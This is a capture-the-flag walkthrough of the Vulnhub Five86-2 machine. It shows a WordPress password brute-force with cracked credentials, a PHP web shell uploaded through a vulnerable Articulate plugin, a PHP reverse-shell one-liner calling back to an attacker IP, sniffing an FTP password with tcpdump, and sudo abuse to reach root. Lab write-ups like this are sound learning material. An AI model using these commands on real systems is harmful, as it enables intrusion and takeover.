Vulnhub - Five86 writeup
Nmap
We see that there is only two open port. We’ll start our enumeration with the HTTP service.
HTTP
Since we can see that the website is supposed to be running wordpress we’ll just add the IP to our /etc/hosts.
192.168.56.146 five86-2
I then ran wpscan on that website
➜ wpscan -e u,ap --no-banner --wp-content-dir wp-content/ --url http://five86-2/
Since I had 5 user names I decided to do dictionary attack on those accounts so I made a list named users.txt having all the usernames and used rockyou for password list.
barney:spooky1
stephen:apollo1
With the stephen account I was able to login into FTP service. I enumerated lots of file using FTP but none of them lead me to anything. So I decided to login as stephen in WP but again there was nothing interesting. But when we login as barney in WP we see that there are some plugins allowed.
If you notice one thing is that only one of them was active so I looked around for any exploit and actually found one WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution, the only issue in that exploit is that in the end it ask you to visit wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami but it should be wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami notice the wp-content in place of wp-admin other than that everything should be same.
echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
Then upload the zip file and visit http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami and you should have the RCE.
Now we can use this exploit to get a reverse shell. I tried to run nc shell command but it didn’t worked so I used the following PHP command:
php -r '$sock=fsockopen("192.168.56.1",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Privilege escalation
Since I have two username and password I tried to su into those account and I was succesfully able to change to stephen account.
I then ran my enumeration script and found out that there was a suid present but it can only be run by peter. Now after looking around for a while I noticed that stephen was in pcap group.
And then in the output of my enumeration script I saw that tcpdump had some capabilities.
So I decided to run tcpdump on the lo interface and just see what I could catch.
timeout 300 tcpdump -i lo -w hack.pcap
And then used FTP to download the file easily to my system to analyze it.
In that file I saw that there was some FTP protocol and it had the name of paul so I read that packet conversation and found the password for paul
paul:esomepasswford
We are paul but we need to become peter so I again looked around and found out that paul is allowed to run /usr/sbin/service as peter because of sudo-rights.
I used gtfo to search gtfobins for this service and found a way we can spawn a shell using it:
We can run sudo -u peter service ../../bin/sh
And then I noticed that peter have sudo rights too, he was allowed to run passwd as root.
So I used that to change the password of root to hackerman.
And then got the root shell and root flag.
Really enjoyed this one, looks like we’ll be getting another awesome series from @DCAU7.
Thanks to @Five86_x for letting me beta test this.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”. And if you’d like to support me considering donating 😄